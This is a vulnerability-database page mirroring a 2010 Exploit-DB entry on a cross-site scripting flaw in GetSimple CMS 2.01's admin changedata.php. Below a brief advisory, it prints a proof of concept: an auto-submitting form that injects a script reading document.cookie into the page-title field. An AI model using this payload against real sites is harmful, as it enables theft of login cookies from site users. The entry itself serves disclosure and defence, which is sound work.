Lucene search
+L

Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting

🗓️ 29 Sep 2010 00:00:00Reported by High-Tech Bridge SAType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

GetSimple CMS 2.01 'changedata.php' Cross-Site Scripting vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-4863
29 Sep 201000:00
circl
cve
CVE
CVE-2010-4863
5 Oct 201110:00
cve
cvelist
Cvelist
CVE-2010-4863
5 Oct 201110:00
cvelist
euvd
EUVD
EUVD-2010-4828
7 Oct 202500:30
euvd
htbridge
htbridge
Multiple Cross-site Scripting Vulnerabilities in GetSimple CMS
10 May 201000:00
htbridge
nvd
NVD
CVE-2010-4863
5 Oct 201110:55
nvd
openvas
OpenVAS
GetSimple CMS < 2.03 Multiple Vulnerabilities
26 Jul 201000:00
openvas
prion
Prion
Cross site scripting
5 Oct 201110:55
prion
source: https://www.securityfocus.com/bid/43593/info

GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

GetSimple CMS 2.01 is vulnerable; prior versions may also be affected.

<form action="http://host/admin/changedata.php" method="post" name="main" > <input type="hidden" name="post-title" value='page title"><script>alert(document.cookie)</script>' /> <input type="hidden" name="post-id" value="test" /> <input type="hidden" name="post-metak" value="" /> <input type="hidden" name="post-metad" value="" /> <input type="hidden" name="post-parent" value="" /> <input type="hidden" name="post-template" value="template.php" /> <input type="hidden" name="post-menu" value="test" /> <input type="hidden" name="post-menu-order" value="" /> <input type="hidden" name="post-content" value="page html" /> <input type="hidden" name="existing-url" value="test" /> <input type="hidden" name="submitted" value="Save Updates" /> </form> <script> document.main.submit(); </script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation